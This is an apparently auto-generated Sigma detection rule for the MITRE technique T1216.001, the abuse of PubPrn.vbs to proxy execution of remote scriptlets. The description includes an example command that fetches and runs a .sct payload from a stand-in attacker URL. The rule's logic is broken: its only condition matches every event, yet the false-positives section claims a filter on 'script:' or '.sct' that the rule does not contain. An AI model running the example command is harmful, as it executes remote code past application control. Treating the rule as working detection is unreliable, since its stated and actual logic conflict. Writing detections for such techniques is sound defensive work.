title: PubPrn (T1216.001)
id: df00tech-t1216-001
status: experimental
description: "Adversaries may abuse PubPrn.vbs to proxy execution of malicious remote scriptlet files. PubPrn.vbs is a Microsoft-signed Visual Basic Script located at C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs that is designed to publish printers to Active Directory Domain Services. Because the script is signed by Microsoft, it can be used to bypass application control solutions that trust Microsoft-signed code. Adversaries pass a script: URI scheme as the second parameter (e.g., pubprn.vbs 127.0.0.1 script:https://attacker.com/payload.sct) to fetch and execute a remote COM scriptlet (.sct) file via scrobj.dll. The script is typically invoked via cscript.exe or wscript.exe. Windows 10 and later versions restrict the second parameter to LDAP:// URIs, mitigating the remote code execution vector on patched systems; however, legacy environments and custom scripts may remain vulnerable."
references:
  - https://attack.mitre.org/techniques/T1216/001/
  - https://df00tech.com/detections/T1216.001
author: df00tech
date: 2026/04/19
tags:
  - attack.t1216.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Legacy printer management scripts that reference pubprn.vbs legitimately via LDAP:// — these will NOT match this query since we filter for script: or .sct"
  - Red team or penetration testing exercises using PubPrn as a living-off-the-land bypass
  - Security researchers validating detection coverage by running atomic tests in a lab
level: high